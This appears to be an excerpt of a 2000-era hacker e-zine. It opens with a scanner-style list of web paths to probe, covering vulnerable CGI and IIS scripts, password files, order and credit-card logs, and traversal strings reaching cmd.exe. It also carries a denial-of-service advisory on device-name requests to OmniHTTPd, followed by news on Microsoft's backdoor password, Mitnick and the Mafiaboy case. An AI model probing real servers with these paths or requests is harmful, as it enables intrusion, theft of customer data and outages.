/cgi-bin/program.pl
/cgi-bin/ntitar.pl
/cgi-bin/enter.cgi
/cgi-bin/test.html
/cgi-bin/test-unix.html
/cgi-bin/printenv
/cgi-bin/dasp/fm_shell.asp
/cgi-bin/cgiback.cgi
/cgi-bin/unlg1.1
/cgi-bin/unlg1.2
/cgi-bin/gH.cgi
/cgi-bin/rwwwshell.pl
/cgi-bin/php
/cgi-bin/perl
/cgi-bin/wwwboard.cgi
/cgi-bin/guestbook.cgi
/cgi-bin/guestbook.pl
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/password
/cgi-bin/password.txt
/cgi-bin/flexform.cgi
/cgi-bin/MachineInfo
/cgi-bin/lwgate
/cgi-bin/lwgate.cgi
/cgi-bin/LWGate
/cgi-bin/LWGate.cgi
/cgi-bin/nlog-smb.cgi
/cgi-bin/icat
/cgi-bin/tst.bat
/com1
/com2
/com3
/con
/_vti_pvt/service.pwd
/_vti_pvt/users.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/administrators.pwd
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_vti_bin/fpcount.exe
/cgi-dos/args.bat
/cgi-dos/args.cmd
/cgi-win/uploader.exe
/cgi-shl/win-c-sample.exe
/scripts/issadmin/bdir.htr
/scripts/CGImail.exe
/scripts/tools/newdsn.exe
/scripts/fpcount.exe
/scripts/no-such-file.pl
/scripts/counter.exe
/scripts/uploadn.asp
/scripts/convert.bas
/scripts/iisadmin/ism.dll
/scripts/tools/getdrvrs.exe
/scripts/tools/dsnform.exe
/scripts/samples/search/webhits.exe
/scripts/../../cmd.exe
/scripts/webbbs.exe
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/scripts/cpshost.dll
/scripts/tools/getdrvs.exe
/scripts/pu3.pl
/scripts/proxy/w3proxy.dll
/WebShop/templates/cc.txt
/WebShop/logs/cc.txt
/WebShop/logs/ck.log
/config/orders.txt
/config/import.txt
/config/checks.txt
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/snippets/fileexist.cfm
/iissamples/exair/howitworks/codebrws.asp
/iissamples/sdk/asp/docs/codebrws.asp
/iissamples/iissamples/query.asp
/iissamples/exair/search/advsearch.asp
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/anot.htr
/iisadmpwd/anot3.htr
/pw/storemgr.pw
/config/mountain.cfg
/orders/mountain.cfg
/quikstore.cfg
/PDG_Cart/shopper.conf
/search97.vts
/carbo.dll
/msadc/Samples/SELECTOR/showcode.asp
/adsamples/config/site.csc
/Admin_files/order.log
/mall_log_files/order.log
/PDG_Cart/order.log
/doc
/doc Boa?? 8-)
/.html/............./config.sys
/ssi/envout.bat
/~root
/server%20logfile
/....../autoexec.bat
/perl/files.pl
/lpt
/AdvWorks/equipment/catalog_type.asp
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/admin.php3
/code.php3
/bb-dnbd/bb-hist.sh
/domcfg.nsf
/today.nsf
/names.nsf
/catalog.nsf
/log.nsf
/domlog.nsf
/secure/.htaccess
/secure/.wwwacl
/WebSTAR
/msadc/msadcs.dll
/?PageServices
/_AuthChangeUrl?
/........./autoexec.bat
/.html/............/autoexec.bat
/......../
/eatme.idc
/eatme.ida
/eatme.pl
/eatme.idq
/eatme.idw
/default.asp
/default.asp::$DATA
/default.asp.
/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
/samples/
/photoads/cgi-bin/env.cgi
/photoads/cgi-bin/
/photoads/
/session/admnlogin
/session/adminlogin?RCpage=/sysadmin/index.stm
/cfappman/index.cfm
/samples/search/queryhit.htm
/msadc/msadcs.dll
/publisher/|publisher
/PSUser/PSCOErrPage.htm
../../boot.ini
../..
/aux
/status
/log
@HWA
06.0 Project Gamma interviews SpaceRogue of HNN
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Space Rogue
Date Published: March 12, 2000 Date Conducted: March 11, 2000 Interview
Conducted By: WHiTe VaMPiRe Interview Conducted With: Space Rogue
Space Rogue is the editor of the Hacker News Network, a member of
L0pht Heavy Industries (Now @Stake) -- he also previously maintained
the Whacked Mac Archives, one of the largest Macintosh
hacking-related sites on the Internet.
Questions are colored and Space Rogue's answers are indented.
How did you first get involved with computing?
A door to door Osborne Salesperson came to my house. Showed us an
Osborne One. While our family could not afford it $2,000+ that is
where I started. I convinced him to come back several times on the
premise of maybe we will buy it. In those few hours I learned a lot.
What would you consider your first computer?
Commodore 64.
What projects were you involved with before the L0pht?
Nothing anyone would know about.
How did you get involved with the L0pht?
I knew most of the other founders for years via local bulletin board
systems.
What are your feelings on the merger of the L0pht and @Stake?
A good thing in general, it allows time and resources to be devoted
to important projects that would never have been possible before.
What initially brought you to create the Hacker News Network?
I was sharing URLs with a small group of people and decided that it
would be better to put them on the web and share them with a larger
audiance.
Many have noticed that after the L0pht / @Stake merger the commercial
content was removed from HNN. How else will the merger effect HNN?
@Stake is commited to vendor neutrality which is why all
advertisements where removed. You will also notice the removal of
the HNN Store and no more T-shirt sales. In the future you can
expect even more changes including even the name of the site as it
gets integrated into the @Stake corporate web presence.
What do you have planned for HNN's future?
HNN's future is pretty much out of my hands at the moment.
Do you have any comments on the medias interpretation of "hackers,"
"crackers," and the related communities?
This is an ongoing battle sometimes I think we are winning, and
other times I think we have failed miserably. There are some
journalists out there who actually 'get it' but many many others
need to be educated.
Do you think the media has at all improved with its coverage of 'hacking'
related topics in the past few years?
Well they have given it more coverage, not sure if that qualifies as
an improvement though. This is especially evident during fast moving
critical stories such as the recent DDoS attacks. Some news outlets
got it right but many more got it wrong.
How do you think they could improve their coverage and cut down the FUD
(Fear, Uncertainty, and Doubt)?
Education. Unfortunately many reporters have little to no
understanding of technology.
Why was the name of Project BootyCall changed to TBA?
No comment.
What is your opinion on Web site defacements?
Most are childish and serve no purpose. You would think that people
who are taking such an immense risk of going to jail would have
something better to say that 'Props to my peeps.'
The Hacker News Network is accessible at http://www.hackernews.com/.
Space Rogue can be contacted via spacerog@l0pht.com.
@HWA
07.0 MS Engineers plant secret anti-Netscape password
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by MerXor
MS admits planting secret password
Microsoft engineers placed a password in
server software that could be used to gain
illicit access to hundreds of thousands of
Internet sites worldwide.
By Ted Bridis, WSJ Interactive Edition
April 14, 2000 4:34 AM PT
Microsoft Corp. acknowledged Thursday that its
engineers included in some of its Internet software a
secret password -- a phrase deriding their rivals at
Netscape as "weenies" -- that could be used to gain
illicit access to hundreds of thousands of Internet
sites worldwide.
The manager of Microsoft's security-response center,
Steve Lipner, acknowledged the online-security risk in an
interview Thursday and described such a backdoor
password as "absolutely against our policy" and a firing
offense for the as-yet-unidentified employees.
The company planned to warn customers as soon as
possible with an e-mail bulletin and an advisory published
on its corporate Web site. Microsoft (Nasdaq: MSFT)
urged customers to delete the computer file--called
"dvwssr.dll"--containing the offending code. The file is
installed on the company's Internet-server software with
Frontpage 98 extensions.
While there are no reports that the alleged security flaw
has been exploited, the affected software is believed to be
used by many Web sites. By using the so-called back
door, a hacker may be able to gain access to key
Web-site management files, which could in turn provide a
road map to such things as customer credit-card
numbers, said security experts who discovered the
password.
Two security experts discovered the rogue computer code
-- part of which was the denigrating comment "Netscape
engineers are weenies!" -- buried within the 3-year-old
piece of software. It was apparently written by a Microsoft
employee near the peak of the hard-fought wars between
Netscape Communications Corp. and Microsoft over their
versions of Internet-browser software. Netscape later was
acquired by America Online Inc.
One of the experts who helped identify the file is a
professional security consultant known widely among the
Internet underground as "Rain Forest Puppy." Despite his
unusual moniker, he is highly regarded by experts and
helped publicize a serious flaw in Microsoft's
Internet-server software last summer that put hundreds of
high-profile Web sites at risk of intrusion.
Almost every Web-hosting provider
Russ Cooper, who runs the popular NT Bugtraq
discussion forum on the Internet, estimated that the
problem threatened "almost every Web-hosting provider."
"It's a serious flaw,"
Cooper said. "Chances
are, you're going to find
some major sites that
still have it enabled."
Lipner of Microsoft said
the company will warn
the nation's largest
Web-site providers
directly.
In an e-mail to Microsoft earlier Thursday, Rain Forest
Puppy complained that the affected code threatened to
"improve a hacker's experience." Experts said the risk
was greatest at commercial Internet-hosting providers,
which maintain hundreds or thousands of separate Web
sites for different organizations.
Lipner said the problem doesn't affect Internet servers
running Windows 2000 or the latest version of its server
extensions included in Frontpage 2000.
The digital gaffe initially was
discovered by a
Europe-based employee of
ClientLogic Corp.
(www.clientlogic.com) of
Nashville, Tenn., which
sells e-commerce
technology. The company declined to comment because
of its coming stock sale. The other expert, Rain Forest
Puppy, said he was tipped off to the code by a
ClientLogic employee.
When asked about the hidden insult Thursday, Jon
Mittelhauser, one of Netscape's original engineers, called
it "classic engineer rivalry."
@HWA
08.0 b0f:Omni HTTPD Pro v2.06 for Win9x and NT DoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Main site/home page is http://b0f.freeBSD.lublin.pl/ and is run by
Venglin of b0f.
(NOTE: www.b0f.com, is the old site and that site may be phased out in
the future.- Ed)
-=-
_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 3
Advisory Name: Omni HTTPD Pro v2.06 for Win9x and NT DoS
Date: 12/4/00
Application: Omni HTTPD Pro v2.06 (probably others?)
Vendor: Omnicron Tehnologies Corporation
WWW: http://www.omnicron.ab.ca
Severity: Any user can simply crush remote server with installed
OmniHTTP daemon
Author: sirius ( sirius@linuxfan.com )
Homepage: www.b0f.com
* Overview
Quote from Omnicron Technologies Web site:
"OmniHTTPd is a powerful all-purpose industry compliant web server built
specifically for the Windows 95/98/NT4 platform. In addition to
Standard CGI support, the server sports advanced features such as
Keep-Alive connections, table auto-indexing and server-side includes. For
maximum performance, OmniHTTPd is both 32-bit and multi-threaded. Many
users agree that OmniHTTPd is the fastest and most compact web server
available for the Windows platform ..."
* The Problem
It is possible to crash OmniHttpD Pro. v2.06 (maybe other versions)
because it parse the path strings to call some FAT32/VFAT routines
in the kernel which makes your system unstable and useless until next
reboot.
If you request following directories:
/com1,/com2,/com3,/aux,/lpt1,/lpt2,/clock$,/config$,/nul (and maybe others
but not /con)
the web server accepts the connection.
e.g. if you request /com3 directory on remote server and if it has a modem
device installed on com. port 3 it will crash connection of remote
server and you will have to reboot the machine.
If you have installed device on com. ports and if the remote user request
directory which name matches the name of one device driver (e.g.
/aux) it will crash that device ... if you succeed you will get error 403
: forbidden error.
* Vulnerable Versions
- OmniHttpd version 2.06 Pro under Win98, NT not tested - maybe
other earlier versions
* Fix
Unknown for now, I mailed Omnicron Technologies ... they will probably fix
this bug in next version.
* Additional informations:
Well, i played with this thing and went to SecurityFocus.com to check for
this bug and I found securax security advisory 01 with some general
informations about this bug so if you need more informations read that
advisory at:
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-1&
thread=4.2.0.58.20000306111151.00992c60@urc1.cc.kuleuven.ac.be
copyright � 1999-2000 sirius ,
buffer0verfl0w security www.b0f.com
@HWA
09.0 Judge bans Mitnick from taking part in tech conference
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://deseretnews.com/dn/view/0,1249,160008642,00.html?
Federal judge bans convicted hacker from taking part in tech conference
A federal judge Monday banned convicted computer hacker Kevin Mitnick
from taking part in a technology conference in Salt Lake City Wednesday.
Mitnick, who gained notoriety for his hacking exploits and spent several
years in a federal prison in Lompac, Calif., won't be sitting on a
computer security panel discussion at the Utah Information Technologies
Association conference at the Salt Palace Convention Center. The judge
kiboshed the appearance because Mitnick's prison release agreement
prohibits him from "consulting or advising" on the topic of
computer-related activity.
Monday, Mitnick did an extended interview promoting the panel discussion
on KSL's Doug Wright Show, where he answered callers' questions about
computer security and told the story of his hacking exploits. He
hacked for fun, he said, and never made any money from it.
Richard Nelson, president of UITA, said Mitnick's public relations
representative had indicated that Mitnick had permission to appear from
the U.S. probation office in California. A few days ago, the
organization learned he might not be able to leave California.
Conference organizers are in the process of arranging a replacement for
Mitnick on the cyber-security panel. They are planning on bringing in a
senior staffer from a large company that deals with cyber security.
Nelson said he's sorry Mitnick can't participate. "He's eager to talk and
disappointed he can't come. If you listened (to him on the radio show),
he recognizes he made serious mistakes and he wanted to go forward.
"We're not trying to promote his career, but if he can help information
technology companies in Utah and decision makers dealing with security
issues determine what level of risk they want to take, that's good.
There will always be risk, but you can reduce it by taking security
measures." The UITA conference, "Net Trends 2000: The Digital Revolution"
takes place Wednesday and Thursday.
@HWA
10.0 The continuing saga of MAFIABOY king lemur of DDoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.usatoday.com/usatonline/20000421/2187297s.htm
Hacker's friends may be suspects in cyberattacks
By Kevin Johnson
USA TODAY
WASHINGTON -- Authorities investigating the February attacks on
some of the most popular Internet sites are focusing on three close friends
of the 15-year-old Canadian boy who was charged earlier this week, a
senior U.S. law enforcement official said Thursday.
The three friends of the Montreal computer hacker known as ''Mafiaboy''
are among several potential suspects identified by authorities in the
cyberassaults that temporarily shut down the Web sites of CNN, Yahoo,
Amazon.com and several other media and commercial giants.
Beyond Montreal, authorities are examining the activities of a small group
of hackers thought to be based in Israel. Officials there say the group has
been involved in various online financial crimes, some involving stolen
credit card numbers.
The group is believed to be part of a larger circle of computer users,
including Mafiaboy, who have spent time in an Internet chat room called
TNT. The chat room is accessible only by password.
Investigators also are trying to determine whether Dennis Moran, a
17-year-old New Hampshire hacker known online as ''Coolio,'' was
involved in the attacks in February.
Moran, who authorities say has boasted of being involved in the attacks,
was charged last month in an attack on a Web site run by the Los Angeles
Police Department.
The unidentified Montreal teenager known as Mafiaboy has been charged
only in two attacks against CNN.com, which was shut down for 3 1/2
hours Feb. 8 after it was overloaded with requests.
Mafiaboy claimed credit in chat rooms for similar assaults on sites run by
Yahoo and Buy.com. Officials believe Mafiaboy may have been capable
of directing all the assaults but doubt that he did.
Analysts familiar with the assaults say the software used to wall off access
to the CNN Web site on Feb. 8 was different and less sophisticated than
that used to paralyze Yahoo on Feb. 7.
Michael Lyle, who runs a software security firm in Palo Alto, Calif., said
the attack on CNN involved software commonly found on Internet sites
for hackers.
''I literally could show you how to do it in three or four hours,'' he said.
The goal is to flood Internet sites with tens of thousands of requests,
disguising the source of the assault by routing the requests through
high-capacity computers elsewhere. The tactic overloads the targeted
Web sites, causing electronic paralysis.
Investigators say Mafiaboy orchestrated the attack on CNN.com through
computers at the University of California-Santa Barbara.
A Canadian law enforcement official said that because of Mafiaboy's age,
it is unlikely he would be sent to an adult prison if convicted of ''mischief to
data.''
If prosecuted and convicted as an adult, the teenager could face up to 20
years in prison. But in Canada's juvenile system, he faces a maximum of
two years in a youth detention center if convicted.
@HWA
10.1 Mafiaboy reaction: "yeah right"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.wired.com/news/print/0,1294,35785,00.html
Mafiaboy Reaction: 'Yeah, Right'
by Leander Kahney
2:20 p.m. Apr. 19, 2000 PDT
The hacking community is skeptical that the Canadian Royal Mounted Police
have nabbed the perpetrator of February�s highly publicized denial of
service attacks.
Following news that the Mounties charged a Montreal juvenile in the
attacks, hackers are demanding evidence that the 15-year-old known by the
alias "Mafiaboy" was indeed involved.
"I�m highly skeptical," said B.K. DeLong, a member of Attrition.org, an
Internet security group that monitors and archives website cracks and
defacement.
"I don't think they've found the person who did the attacks. I think law
enforcement is stalling the press and public to keep them off their backs
while they find the real person," DeLong said.
DeLong said his skepticism was based on what appears to be a paucity of
evidence linking "Mafiaboy" to the attacks. According to initial reports,
the RCMP found computer logs and the transcript of an online chat group
that led them to file the charges against the teen, whose real
identity is shielded by Canadian law.
DeLong said law enforcement had already blundered in the case with the
arrest of Coolio, a.k.a. Dennis Moran, who was detained by New Hampshire
police in March in relation to the attacks, but later was charged with the
unrelated defacement of a Los Angeles Police Department anti-drug
site.
DeLong also noted that denial of service attacks are notoriously difficult
to investigate and there has been a suspiciously long delay between the
attacks and the charges.
"I think they should show some definite evidence how they got this guy,"
said Scully, editor of Cipherwar, a technology and politics site. "Chat
list logs are not enough."
Scully said that law enforcement agencies have a poor record of finding
and charging cyber-criminals, as evidenced by the four years notorious
computer hacker Kevin Mitnick was incarcerated awaiting trial.
This is the second time "Mafiaboy" has been linked to the attacks.
Mafiaboy -� whoever that may be -- first was tabbed as a potential
perpetrator of the attacks by an Internet security firm about a week after
they occurred.
Even then, hackers expressed their doubts Mafiaboy was involved.
"I seriously doubt that this guy is an actual suspect," Space Rogue,
editor of the Hackers News Network, told Wired News at the time. "Maybe he
did it, but the information I have doesn't point to that at all."
10.2 Mafiaboy's dad gets busted for conspiracy to DDoS a business associate's head
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I kid you not, I suppose his mum will be up on solicitation charges next...
-Ed
http://www.wired.com/news/print/0,1294,35836,00.html
Like Mafia Son, Like Mafia Dad Wired News Report
10:45 a.m. Apr. 21, 2000 PDT Mafiaboy didn't fall far from the tree,
it seems.
Turns out the Canadian police tapped into some rather incriminating
telephone calls placed by the 15-year-old cracker's dad, who allegedly
took out a contract on a business colleague.
See also: Hot On the Trail of 'Mafiaboy' Reno: 'We Must Punish
Mafiaboy' Mafiaboy Reaction: 'Yeah, Right'
Lieutenant Lenny Lechman said Mafiaboy's 45-year-old father was arrested
last week and charged with conspiring to commit bodily harm.
"We felt that before somebody gets hurt really badly, we had to intervene
as quickly as possible," Lechman said.
Mafiaboy was charged earlier this week with two counts of mischief for a
Feb. 8 denial-of-service attack on CNN.com. He was fingered as a suspect
back in February by Michael Lyle, chief technical officer of
Internet-security firm Recourse Technologies Inc..
Mafiaboy's dad, whose real name is John Calce, was released on bail
Monday.
Mafiaboy himself has also been released, with a Kevin Mitnickian-like
stipulation that he stay away from computers.
Canadian police said they are still analyzing data found on the alleged
cracker's seized computers.
@HWA
10.3 On another mafiaboy note, a new site has popped up on Geocities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.geocities.com/freemafiaboy/
gullible adj 1: easily deceived or tricked ; synonymous with Michael Lyle
Michael Lyle is considered to be a computer security expert....
He is cofounder and Chief Technology Officer of Recourse Technologies in
sunny Palo Alto California, which sells anti-hacker software programs.
Also, he used to work for Exodus Communications whom experienced an
embarrassing hacker break-in while he was employed there, and admits
that he himself used to be a hacker. He goes by the nickname Icee on IRC.
He told ABC he had communicated with Mafiaboy on IRC, and the 15-year-old
said he had attacked not only CNN.com but also E+Trade. Their is now
definitive proof that he was NOT talking with whom he believed was mafiaboy.
Mafiaboy is a 15 year old Canadian.
He was arrested on April 15 and charged with two counts of mischief to data
for the attack that jammed up to 1,200 CNN-hosted Web sites for four hours
Feb. 8.
This website documents the extreme carelessness Michael Lyle showed in his
"investigation" of the DDoS attacks that recently plagued CNN, Yahoo,Amazon,
and E-trade. He is quoted in multiple news articles saying that he had
conversations on IRC with "mafiaboy", who he claims admitted to the attacks
on CNN and E-trade. The methods he used to accertain that this was the the
real "mafiaboy" or if "mafiaboy" actually launched any of these attacks were
extremely inefficient. This website contains concrete proof(from 2600.com)
that on at least one occasion he was not talking to who he believed was
mafiaboy. He later cited information from that same conversation in an
interview with ABC. The General Public should not be constantly under
these misconceptions the media is providing. Upon reading the IRC logs
from 2600.com you will certainly question how gullible Michael Lyle is.
Maybe he was just to focused on the fact of catching the perpetrator of
these "hacker" crimes, so he could claim fame to himself and his company
Recourse Technologies.... and get rich in the process.
Is Mafiaboy real or a creation of the media? 04/20/00
This is the link to the IRC logs which show Michael's conversation with
whom he believed was mafiaboy. Icee is Michael Lyle, while "[mafiaboy]"
is someone from 2600 staff posing as him. This is an extremely hilarious
conversation when you take into the fact that this is all a joke played
on the "security expert" Michael Lyle.
Below are various news stories I found online about mafiaboy.
Probe of Hacker Nets a Second Suspect:
His Father 04/21/2000 NEW INFO IN THIS ARTICLE
The Challenge of Fighting Cybercrime ....04.20.00
Janet Reno licks chops over Mafiaboy arrest 04/20/2000 5:11pm
Canadian Teen Charged in Web Blitz Thursday, April 20, 2000
Canada Arrests 'Mafiaboy' Hacker, Aged 15 Apr 19 2000 7:49PM ET
Canadian Arrest Made in February Web Attacks 04/19/2000 10:10:00 ET
Reno Says 'Mafiaboy' Hacker Must Face Punishment Apr 19 2000 11:04AM ET
�Mafiaboy� Suspected Feb. 16 This is pretty old..
but has some of the initial info.
I have absolutely no idea whether or not mafiaboy is the same person as
the Canadian teen arrested or if mafiaboy is even the individual
responsible for the crimes. I have never conversed with anyone named
mafiaboy and have no idea who he is.
Comments can be e-mailed to Taelon@mail.com
@HWA
10.4 Mafiaboy:Probe of Hacker Nets a Second Suspect: His Father
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.washingtonpost.com/wp-dyn/business/A53181-2000Apr20.html
Probe of Hacker Nets a Second Suspect: His Father
By Steven Pearlstein and David A. Vise
Washington Post Staff Writers
Friday , April 21, 2000 ; A01
ILE-BIZARD, Quebec -- There may be more to the computer moniker "Mafiaboy"
than first believed.
Montreal police said today that they moved in on the 15-year-old hacker
last weekend after learning from wiretaps that his father had taken out a
contract to harm or frighten a business associate and that the
attack was imminent. They had wiretapped the boy's house shortly after
U.S. and Canadian investigators identified that someone who lived there
had launched a disabling computer attack that had shut down CNN's Web
site and possibly other big sites in February.
"We didn't think we could wait any longer," a Canadian police official
said.
Mafiaboy had bragged in online chats and to friends that he had taken down
CNN.com, Amazon.com, Buy.com, eBay and E-Trade, but they didn't believe
him. Federal law enforcement officials in Canada and the United
States took note, however, following up on tips and tracing the
electronic path that led to Mafiaboy's neighborhood in the West Island
section of Montreal, sources familiar with the probe said.
The wiretaps were intended to pick up evidence against the boy and leads
about possible collaborators. Inadvertently, however, a police official
said they also picked up phone conversations from the boy's
45-year-old father, president of a transportation company, as he conspired
with a hit man about harming or scaring a business associate.
Police moved in on both father and son at 3 a.m. Saturday at their home,
charging the son with two counts of "mischief" with data and the father
with two counts of conspiracy to cause bodily harm.
The father, John Calce, was released Monday on $2,000 (U.S.) bail and
ordered not to get within 300 yards of the house or office of the man he
had allegedly targeted.
The boy was also released from detention on the condition that he not
associate with his three closest friends. Canadian law enforcement
officials said yesterday they wanted to prevent Mafiaboy from
using computers belonging to his friends and also did not want him
to attempt to silence his friends, who could be witnesses against him in
the case.
The Royal Canadian Mounted Police, which is handling the investigation of
Mafiaboy's computer hacking, indicated today it expects further charges
will be brought against the boy once they have had a chance to
review all of the evidence and the weeks of wiretaps on the house.
U.S. and Canadian authorities also expect to charge others who may or may
not have collaborated with the Montreal boy, whom police described
as a somewhat amateurish hacker.
There are no indications that the boy is cooperating with the
investigation, and his attorney said yesterday that he intends to shift
the focus from his client to the Web sites that should have
better protected themselves against computer vandalism.
"We can already foresee a long, complex and very technical trial which
will certainly shed light on how a 15-year-old could have done what he is
accused of, to a multinational corporation which almost
certainly could have been expected to be equipped with the most
sophisticated and up-to-date security systems," said lawyer Yan
Romanowski.
The Riverdale High School student with the Mafiaboy screen name struggled
in classes and was transferred to Riverdale this year after being
suspended repeatedly from another school closer to his home,
classmates and law enforcement officials confirmed today. They said
he excelled in one course: computers.
Known as a computer whiz but a constant discipline problem--he had been
suspended from Riverdale twice this year--he frequently talked back to his
English and math teachers, banging his desk and rarely showing up
for class with books and completed homework, according to friends
and classmates who gathered for hot dogs today at La Belle Province, one
block from the campus.
The friends, all of whom declined to give their names, said Mafiaboy had
been bragging about his hacking exploits for the past several weeks.
"I didn't believe him," said one. "He was a bit of a showoff."
"He had a real attitude," said another as he waited for the No. 205 bus
after school. "He wanted to graduate someday, but he knew he had
problems."
Mafiaboy was described by his classmates as bright, engaging, outgoing and
loyal to his friends. He hung out generally with the tough guys and was
known to smoke cigarettes. In dress, he favors baggy pants, a
loose-fitting yellow jacket and Nike T-shirts and shoes.
"He likes to chill the girls after school," said one student having a
cigarette at "The Pit," the unofficial smoking area just outside the
school fence, at lunch time. Although he is said to have had one
or two girlfriends over the years, he does not have one now,
classmates said.
The 5-foot-11 youth played guard in a Saturday afternoon basketball league
on a team called the Brookwood Jazz. He may have more time to shoot hoops
in the weeks ahead, since conditions of his release forbid him
from using the Internet, entering a business with computers or going into
a computer store. He is only allowed to use computers at school under the
strict supervision of teachers and even then, is not allowed to
access the Internet. Canadian police are examining the computers seized
from the boy's house in the Saturday morning raid.
Although he was in biology class yesterday when police announced details
of his weekend arrest, he was reportedly not in school today, on the eve
of a five-day Easter recess in Montreal-area schools.
Riverdale is an ethnically and economically mixed high school in a largely
English-speaking neighborhood, with about 1,200 students. More than half
its students go on to community college or university. Students
are required to wear uniforms.
Mafiaboy lives about a 12-minute drive from the school in a new
development of large brick and stone mini-mansions arrayed around the new
St. Raphael Golf Course.
Yesterday, a "for sale" sign was visible on the lawn of the family's
sea-foam-green brick house, as it has been for four months. The asking
price was recently reduced below $250,000 (U.S.). There is a
paved basketball court on the side.
A teenage boy who answered the door at the house late this afternoon
simply handed the visitor a lawyer's business card. Neighbors out in their
own yards told of a family that kept largely to itself. Mafiaboy's
father is divorced, and the boy and his brother were living with the
father and their stepmother.
One neighbor said the father liked to sit out on the front stoop in his
sweat suit and make loud telephone calls on his cellular telephone using
noticeably crude language.
U.S. and Canadian authorities have been monitoring the home where Mafiaboy
lives for weeks but the authorities said they did not move to make arrests
in the case until they were certain whose fingers were on the
keyboard.
Mafiaboy could be sentenced to a term of up to two years in juvenile
detention for disrupting CNN's Web site, Canadian officials said
yesterday, although they added that sentences for such crimes
typically are stiffer in the United States than in Canada.
"Young hackers, talking mostly now about 14- to 15-year-olds up to 22- or
23-year-olds, sometimes do not realize the damages they could make with
their actions," said Yves Roussell, officer in charge of the
Montreal commercial crime section of the RCMP.
Roussell said U.S. and Canadian politicians need to do a better job of
coordinating the legal penalties and sanctions for cross-border crimes,
including computer hacking, and said additional resources are
needed to fight hacking. He said the RCMP is studying the computers
and data taken from the home.
"There are literally tons of documentation and information to analyze and
scrutinize and devise and from there we will pursue our criminal
investigation," Roussell said. "We are still investigating the
case."
Vise reported from Washington.
� 2000 The Washington Post Company
@HWA
10.5 Mafiaboy:The Challenge of Fighting Cybercrime (Reno)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cipherwar.com/news/00/reno_2.htm
The Challenge of Fighting Cybercrime ....04.20.00
If you haven't heard, the Canadian police have arrested a 15 year-old boy
in connection with the February DDoS attacks. Canadian law protects
the suspect's privacy by prohibiting the release of Mafiaboy's true
identity. This fact alone is a refreshing change from the American way of
donig things. Arrest someone on the most pathetic evidence you can obtain,
like chat room logs, and release their identity, ruin their lives, and
then release them because there is not enough evidence.
Janet Reno, among other inadequate criminal investigators, claims that the
arrest proves that they can track down cybercriminals. Reno forgets
that an individual is innocent until proven guilty, therefore they have
not proven they can track down cybercriminals. And how long has it taken
them to even find a 15 year-old boy to pin it on? Mafiaboy was arrested in
Canada, and this is probably a good thing for him since the US Justice
Department would probably have hung him out to dry as the big bad hacker,
that he is probably not.
Just to show how ridiculous Janet Reno is, below is an exerpt, uncut, of
an address by Reno in February shortly after the DDoS attacks.
The entire "statement" can be found here:
http://www.cybercrime.gov/ag0216.htm.
The Challenge of Fighting Cybercrime
The recent attacks highlight some of the challenges we face in
combating cybercrime. The challenges come in many forms: technical
problems in tracing criminals operating online; resource issues
facing federal, state, and local law enforcement in being able to
undertake online criminal investigations and obtain evidence stored
in computers; and legal deficiencies caused by changes in
technology. I will discuss each of these briefly.
As a technical matter, the attacks like the ones we saw last week
are easy to carry out and hard to solve. The tools available to
launch such attacks are widely available. In addition, too many
companies pay inadequate attention to security issues, and are
therefore vulnerable to be infiltrated and used as launching pads
for this kind of destructive programs. Once the attacks are
carried out, it is hard to trace the criminal activity to its
source. Criminals can use a variety of methods to hide their
tracks, allowing them to operate anonymously or through masked
identities. This makes it difficult � and sometimes impossible �
to hold the perpetrator criminally accountable.
Even if criminals do not hide identities online, we still might be
unable to find them. The design of the Internet and practices
relating to retention of information means that it is often
difficult to obtain traffic data critical to an investigation.
Without information showing which computer was logged onto a
network at a particular point in time, the opportunity to determine
who was responsible may be lost.
There are other technical challenges, as well, that we must
consider. The Internet is a global medium that does not recognize
physical and jurisdictional boundaries. A hacker � armed with no
more than a computer and modem � can access computers anywhere
around the globe. They need no passports and pass no checkpoints
as they commit their crimes. While we are working with our
counterparts in other countries to develop an international
response, we must recognize that not all countries are as concerned
about computer threats as we are. Indeed, some countries have weak
laws, or no laws, against computer crimes, creating a major
obstacle to solving and to prosecuting computer crimes. I am
quite concerned that one or more nations will become "safe havens"
for cybercriminals.
Resource issues are also critical. We must ensure that law
